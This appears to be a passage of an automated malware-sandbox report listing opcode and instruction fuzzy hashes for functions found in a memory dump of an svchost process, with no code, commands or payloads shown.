                                          • Opcode Fuzzy Hash: d9ca2c8fef75fbfe160ed619a0a8349c6392c8bfa66e07faea3c5be0e23179cc
                                          • Instruction Fuzzy Hash: B6116935A0020CEBDB05EFA8C954FAE7BB9FB48244F004099EA019B390DA35EE11CB90
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
                                          • Instruction ID: c4336b39ccda30246c053e80c8c6f66b341711bc3bfa2cf2541de428d6e7dd3e
                                          • Opcode Fuzzy Hash: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
                                          • Instruction Fuzzy Hash: 63117C32900F129FD721DE15C980B22B7E4BF807A2F1A886CD4894A6A5C374E891CF10
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
                                          • Instruction ID: da4e91cf17d8bac2ae839b41f46928180603259a342dec4f6d3768e879d0f888
                                          • Opcode Fuzzy Hash: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
                                          • Instruction Fuzzy Hash: 0401863A700205A7CB12DA9ADD00F5FBA6C9F94A81F254439FD15DB360EA30DD02C774
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                          • Instruction ID: f76244ab344fb4df30b3066303bed062fbfa626ef1648158eb5d951b3710a666
                                          • Opcode Fuzzy Hash: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                          • Instruction Fuzzy Hash: 1D0147BAB106049BD711DA54E804F65B3ADEFC4668F144159FF128F380CB34DC01CB98
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 457b4f43a5e5d9c577d627971690c07d19d696b6a9381d934377f3d6e4edc0aa
                                          • Instruction ID: 5f040be70e1cdfb4621725d596098f9da005aed60bd61063cb8d91650e8ea516
                                          • Opcode Fuzzy Hash: 457b4f43a5e5d9c577d627971690c07d19d696b6a9381d934377f3d6e4edc0aa
                                          • Instruction Fuzzy Hash: 56012035701A14DFD714EF65DD109AFBBB8EF45210B1A402DD902AB641EE30DD01CBD9
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                          • Instruction ID: 9f051f0cafd11d7db0c96c9f31171ffbe7030b27eadd47ede9db5802b45d4cb0
                                          • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                          • Instruction Fuzzy Hash: 91015672600A809FD322D71DCA48F76BBECEB49B50F0D04A6E815CBBA2D729DC51C625
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 28eb0563d2d3d1be69d1a7ca1f472b6d9734c01e78e3bfd62b72e92d8b014205
                                          • Instruction ID: 4704847243fe61f21450171e2ff5355f1a94bd49ae16f9d525b6314846639869
                                          • Opcode Fuzzy Hash: 28eb0563d2d3d1be69d1a7ca1f472b6d9734c01e78e3bfd62b72e92d8b014205
                                          • Instruction Fuzzy Hash: 55018F75A11358EBDB10EBA9D805FAEBBB8EF44700F44406AB500EF380DAB4D901C7A4
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                          • Instruction ID: e55596d33dfde9271844e2881c656f44701300612e66d90dcfe3f6a49795b747
                                          • Opcode Fuzzy Hash: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                          • Instruction Fuzzy Hash: 2111A5B1A106219FDB88CF2DC0C0651BBE8FB88350B0582AAED18CB74AD374E915CF94
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fc8b07abd60fb71f9e7d644ca86fdc3e78e5a6f765da5a35bc196ecdce60ed25
                                          • Instruction ID: b9f5f8f316792b186578b9b949e6980f17c3857c257f0498157b5a3da0a28c24
                                          • Opcode Fuzzy Hash: fc8b07abd60fb71f9e7d644ca86fdc3e78e5a6f765da5a35bc196ecdce60ed25
                                          • Instruction Fuzzy Hash: 4C118078D10249EFCB04DFA9D444A9EB7B4FF18704F14805AB814EB381D734DA02CB95
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                          • Instruction ID: 8767c2154e4d7291eb75b7148949b1237a59a9d8ec0ef9d18f121c0e3c5de0cd
                                          • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                          • Instruction Fuzzy Hash: 45F0FC37244F329BC732DA594880F6FAD998FC9AA4F1B0439E1099F304CA658C025ED1
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c6f4f05671e9f1230e162b98a860251649f6ffc591254f8c8c4ca7feb48caad2
                                          • Instruction ID: 1736252855047ee0d8d12a2bd90f1a2f6c2feff6d1071f91daea75b88f444b57
                                          • Opcode Fuzzy Hash: c6f4f05671e9f1230e162b98a860251649f6ffc591254f8c8c4ca7feb48caad2
                                          • Instruction Fuzzy Hash: 87012C75A10209EBDB00DFA9D941AEEBBF8FF49310F14405AE900EB380D674AA018BA5
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 949e36def529ad5df9f9ddb4d32baef4e23082be5d0dd99124e6adfd80ec623f
                                          • Instruction ID: 5332e48169bb9aede17028dc8e2fdd59d3df02fb0bf514b7223fdde0bb982519
                                          • Opcode Fuzzy Hash: 949e36def529ad5df9f9ddb4d32baef4e23082be5d0dd99124e6adfd80ec623f
                                          • Instruction Fuzzy Hash: B5012C75A1030DEBDB04DFA9D941AEEB7F8EF49310F50405AF901EB381D674AA018BA5
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                          • Instruction ID: 52ede60d94fa9432c90626fc0e199e3fd3d42f54b7b09238c7f9041e4b0765d1
                                          • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                          • Instruction Fuzzy Hash: 65F0AFB3A00610ABD324DF4D9940E57F7EADBC0A80F088128A905CB320EA31DD04CB90
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: edfcb549e1edbcc164ce3daae0ab61b33f836980f8244fec9b7d94a202dbdb93
                                          • Instruction ID: 838d6c660a36fead370756d490107e3cdf8ef0aba0ddeb654130ff6b08563926
                                          • Opcode Fuzzy Hash: edfcb549e1edbcc164ce3daae0ab61b33f836980f8244fec9b7d94a202dbdb93
                                          • Instruction Fuzzy Hash: E4012CB5A00309EBDB00DFA9D945AEEB7F8EF49310F50405AE500FB381D674A9018BA5
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                          • Instruction ID: 77c2a80cff380f4130b742b7b289696d53c673ae205bc3cc8560869e5803852c
                                          • Opcode Fuzzy Hash: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                          • Instruction Fuzzy Hash: 62F0FF72A01214BFE319CF5CC945F6AFBEDEB46690F094079D602DB231E671EE04CA94
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f80d8643c94853e10e5306c1c2fdc016f314b3c23483181dbad9838823764ca4
                                          • Instruction ID: 71907c388c790b3d811d7a416b77160e9ae5f2195d0bf026fa2f2b3d2ae6f5e4
                                          • Opcode Fuzzy Hash: f80d8643c94853e10e5306c1c2fdc016f314b3c23483181dbad9838823764ca4
                                          • Instruction Fuzzy Hash: C0010CB4E01749AFCF04DFA9D545AAEBBF4EF08304F10806AA855EB341E674DA00DB95
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bf1653923784b0b0c6f54cc93ba63c63fb01472394b1b66733c5e30343ecc6ca
                                          • Instruction ID: f93f63f241f8d96483ee9a6d12696d48df59eb776cbc85be8c11dcca7fffcee1
                                          • Opcode Fuzzy Hash: bf1653923784b0b0c6f54cc93ba63c63fb01472394b1b66733c5e30343ecc6ca
                                          • Instruction Fuzzy Hash: E9F0C876F11348ABDB04DFB9C905AEEB7B8EF44710F00805AE501EB380DA75D9058795
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3369c335e10458e447d0b5fa57f19f15a4a035caee9f9d756c5098b80ccddbb1
                                          • Instruction ID: 0799bd445c09edaad23514940cc2d6f1d7235c922086bb68c02ec2ade1eea6f6
                                          • Opcode Fuzzy Hash: 3369c335e10458e447d0b5fa57f19f15a4a035caee9f9d756c5098b80ccddbb1
                                          • Instruction Fuzzy Hash: 7E018F71A00258DBCB00DFA9D855AEEB7F8EF48310F14405AE500AB380D778EA01CB99
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
                                          • Instruction ID: 4f5266759d88b01cf4f50f0b064c4e734ef84f12d55654f4f75e6fdde86c2268
                                          • Opcode Fuzzy Hash: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
                                          • Instruction Fuzzy Hash: B4F0F675A11355ABEB10D7AACA40FABFBAC9F80658F088595F9029B240DA30E940C758
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 01c7c2cdad686d23e45db5bfd9538ef580b1af2983026a07dc9e34b7524183fe
                                          • Instruction ID: 85cde8ca7345db8d7609492d8f6b59a104e160e9d3fa04962e559082716be653
                                          • Opcode Fuzzy Hash: 01c7c2cdad686d23e45db5bfd9538ef580b1af2983026a07dc9e34b7524183fe
                                          • Instruction Fuzzy Hash: 7B011A74E00209DFDB04DFA9D545B9EF7F4FF08300F148269A519EB382EA749A40CB95
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0622290fbb8df94890b676cf30aa8ffe978b2e3855a4d0dacbbcda034e23dd33
                                          • Instruction ID: c7c0a44260b78f7450a14d4b3f81b058a4e654f1e5648f5a8e687b45fcb62ac7
                                          • Opcode Fuzzy Hash: 0622290fbb8df94890b676cf30aa8ffe978b2e3855a4d0dacbbcda034e23dd33
                                          • Instruction Fuzzy Hash: BBF02B712047245BE315D659DD17B673E99DBD0651F2A806AE7058F3C0EE70DC018794
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9c86c39bdb6e5f373c63bc0b61fffc749c090866831c7dd43b14b299580d1563
                                          • Instruction ID: 31de4e04013b1c4ec6057ee7d59a0a6ab8350afb0833a2672a65de447cabcf76
                                          • Opcode Fuzzy Hash: 9c86c39bdb6e5f373c63bc0b61fffc749c090866831c7dd43b14b299580d1563
                                          • Instruction Fuzzy Hash: 2AF04FBA940304BFE711EBA4CD41FDA77FCEB04714F10016AAA16DA1D0EA70AA44CB94
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                          • Instruction ID: 331030cd5d91319d6643b8eea1c28c16f97d2fead2788fc95f51a39167ab1f96
                                          • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                          • Instruction Fuzzy Hash: DEF08935B41B2247DB77EA6F9510B2EE2559F80A50B4F052C9556CFF40DF70DC018794
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e1c2db69c223cf5b712f0009a9c9c2f9102ad27a7f4679d6ffbee406bccf048b
                                          • Instruction ID: e16628462a0112ea6cab47178ff2d38b8999c1dbd2c6b105ec2074b6355b2ed9
                                          • Opcode Fuzzy Hash: e1c2db69c223cf5b712f0009a9c9c2f9102ad27a7f4679d6ffbee406bccf048b
                                          • Instruction Fuzzy Hash: 5DF04F75E01348EFCB04EFA9D545A9EB7F4EF08300F508069B945EB382D674DA01CB55
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2ee942ddc1b6bf002d11563af606e355c8b228b598197ad8cce22de3d1396f20
                                          • Instruction ID: 321ac88067a363630f58c84dc12ae148087275ad6c1b33801905834a9105faca
                                          • Opcode Fuzzy Hash: 2ee942ddc1b6bf002d11563af606e355c8b228b598197ad8cce22de3d1396f20
                                          • Instruction Fuzzy Hash: F7F0FA32200B40ABC731EB09CD04F9ABBEDEFC4B00F19012DA94283290C7A1A908CAA0
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ad5bf681d77475fe1f3a5c0182c9de2b686f9fac84c58a70a42ec50d79320987
                                          • Instruction ID: 268d06df24e9fd3ace0d8f1f16e42549a1d46b42b3445e9da42dcd89a2a00756
                                          • Opcode Fuzzy Hash: ad5bf681d77475fe1f3a5c0182c9de2b686f9fac84c58a70a42ec50d79320987
                                          • Instruction Fuzzy Hash: AFF090399127D09ED723CB5ACA44B21F7D8DB03664F0C89AAD48A87641CF34D881CA50
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cdfd0fa44d5ed51b69b90b7dfbb1e7418d677247e76ae7802a259ca2672a66f7
                                          • Instruction ID: c441be79009d867f33cd99f52a975aa3add421d3466b1f7b7d070cb1d1bf6bca
                                          • Opcode Fuzzy Hash: cdfd0fa44d5ed51b69b90b7dfbb1e7418d677247e76ae7802a259ca2672a66f7
                                          • Instruction Fuzzy Hash: 55F06D79A10348EBDB04EFA9D909EAEB7F4EF08304F404069E501EB381EA74D901CB58
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cef8353970f5f15c084f3c096543240baa731534450aa606ced8581e6dff8381
                                          • Instruction ID: f7b71183d1876fd437421208d4d15b3b308495d3a6aa0e63819d0b1dabaee533
                                          • Opcode Fuzzy Hash: cef8353970f5f15c084f3c096543240baa731534450aa606ced8581e6dff8381
                                          • Instruction Fuzzy Hash: 01F0273A4167C04ECF31FB68A650391AF599752014F1D108EC5E15B306C9B88483C624
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d8834f43084d3a8aa023cc17cb21fab90b08f3c6a9f512e18630ca5a591c12b9
                                          • Instruction ID: f93adc97dbb723d6e36df74681b44b904dec480ed4b1affb6dec77a1dc374b85
                                          • Opcode Fuzzy Hash: d8834f43084d3a8aa023cc17cb21fab90b08f3c6a9f512e18630ca5a591c12b9
                                          • Instruction Fuzzy Hash: F8F03A74A14348EBDB04EBB9E545AAEB7B4EB08204F608059A501EB281DA74D9019B69
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a8a583e2cd2c83fe574c0afc55df1cd5f983ee96a56343f9064cdb6fac9f776c
                                          • Instruction ID: 9c614fec6fe38492424ff415325c5cf53237f99c70eea97b869d51d76fefdd63
                                          • Opcode Fuzzy Hash: a8a583e2cd2c83fe574c0afc55df1cd5f983ee96a56343f9064cdb6fac9f776c
                                          • Instruction Fuzzy Hash: 18F0BE74A10348EBDB04EFB9E905EAEB3F4EF08304F544058A401EB3C1EA74D900CB58
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4001dfbc9816aa390cef83ffcf6f01e3c1189e5e2e2015b80ad45b1e37276767
                                          • Instruction ID: d5817461df512921e0bd17e07e18c31dbbaa68a09ba00614cba185cd5f094340
                                          • Opcode Fuzzy Hash: 4001dfbc9816aa390cef83ffcf6f01e3c1189e5e2e2015b80ad45b1e37276767
                                          • Instruction Fuzzy Hash: FCF05E78A14348EBDB04EBB9D905EAEB7F4FF09300F544459A541EB3C1EA74D9009B55
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                          • Instruction ID: c36a9c33b2ca430ead0b883c812cc505e451a61c2c1b9759280d46c758feee7c
                                          • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                          • Instruction Fuzzy Hash: 96E092723006002BD721EE59CCD0F4777AEAF82B10F44047EB5045E252CAE29C1982A8
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File (shared by every function entry listed below): hcaresult_8_2_3600000_svchost.jbxd
• Memory Dump Source (shared by every function entry listed below): 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
• Similarity: API ID, String ID and API String ID are empty for every entry below (the plugin resolved no API calls or strings in these functions). In every entry the Opcode Fuzzy Hash is identical to the Opcode ID, so each entry lists Opcode ID, Instruction ID and Instruction Fuzzy Hash once.
• Opcode ID b9004c15fce1af9fc9e3e9ba51a63370c765181f51bb171a0e858f753c72e17a; Instruction ID 045f4f238270bb687eb8358d96a93e018f852b528884e8617524413405d48649; Instruction Fuzzy Hash 13F0A074A0434CEBDB04EBB9D949E9EB7F8EF0A304F640059E502EB3D1EA74D9008B19
• Opcode ID dff14156f6bf2e6c8c644882bbcae77e5fc931c7f9e19120c7ccfeaf89162f07; Instruction ID 7afed989c21a332b914b2b30b708f3810326a707bb68fcf4b66cb5cc758eeb52; Instruction Fuzzy Hash ADF08274A14348EBDB14EBB9D905EAEB3F8EF04704F540458A901EB3C1EA74D9008759
• Opcode ID cc4b5e256cb3d8e99aa5b7bc2b0d4058efce7024642ac4284b2da8019798e104; Instruction ID d00ab186725895ab7102e999d74e34d240c450f24b2ea2356488bbb9a5f36660; Instruction Fuzzy Hash 8DF02071911A849FC723C72ECA84B22B3DD9F01BB4F0C80A0D4098F701CFA8CC80CA90
• Opcode ID 5cf0e3bd718d101eaae9fc536793a6022e1fa565dcf991ad2415c29802d213e0; Instruction ID 644aea16501c4773e692f8fc2a776c7e3d4c5fdf4c32d6d7d4a1bd91950d6c9c; Instruction Fuzzy Hash EBF082B4A14248EBDB04EBB9D905E6EB3F4EF04304F540059A901EB3C1EA74E900CB59
• Opcode ID 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017; Instruction ID 5297cc75422348fc23b988c0c29b3b1707e1ad94aca4c50052a918f098b4bc9b; Instruction Fuzzy Hash 1AF0E53360461467C330AA0D8C15F5BFBACDBD5B70F20431ABA249B2D0DA70A911D7DA
• Opcode ID 29eb063e0ff56d2629be013ed7575b20f267b818822edeb5b476ec8fba3bb552; Instruction ID 8f7f7a54388f16d40468366491359ca44aeeb5c15045de2da7f0d70a4fbb8787; Instruction Fuzzy Hash 89F0E274A11348ABDB04EBB9D549E9E77B4EF08700F410058F101EF380D974D9019718
• Opcode ID 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c; Instruction ID c8a76dd76166bd055a517a04fc9b68d60e40d03babd9cc9a09acfa8f61b3c8d5; Instruction Fuzzy Hash AAF0ED3E2043409BDB16DF19C540AA57BB8EB4A360B1400D8E8428B300EB32E986CB84
• Opcode ID 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea; Instruction ID 667646c4acd9c90df5db0835e992e47794fb80a9e82e5a33178599539b90fce5; Instruction Fuzzy Hash 35E06D76210200AFE764DB58CD45FA673ECEB01720F540258B115971D0DAB0AE40CA64
• Opcode ID 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a; Instruction ID 324ce669774715bd7523f383deaab3ad2220d0cc93b8e71b337ecbbcd759d54f; Instruction Fuzzy Hash 55E0CD35245714B7DB22AA40CD00F697B15DF507D0F108035FA085F750C5719C55D6D4
• Opcode ID 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7; Instruction ID 834d9d46293665bc714a4952a0fee6aea5080fbeb180ccfb76e4a3b2355934a0; Instruction Fuzzy Hash 6EE08C35502A20EEDB31EF11DD14B527AB5FB88B10F26896DE0810B5A487B0A892DE8C
• Opcode ID e73b94475550c6a3cdf18838e5e83ccdfd1444e4c3d6ebe705afbddb7c31e449; Instruction ID 4fc80d0275829fe69c39a1ac3eb2d17e58b6e379bd7d2cefe220812c93006c69; Instruction Fuzzy Hash 05F0E535651B84CFE72ADF08C2E2B91B7F9FB55B40F504458D4468BBA1C73AA982CF40
• Opcode ID bab4011fdeb0f07e60481eab7e94cb91a9ab15f20f954a9dab46cfa851d51685; Instruction ID 3f03268d082549aa26ce4025d68eafaacb6b2add09ddbdc6fdd8da8a1a2f0dff; Instruction Fuzzy Hash C9E0C2322006506BC322FB5DDD10F4A739EEFA6360F104129F1508B6D0CA64AC10C798
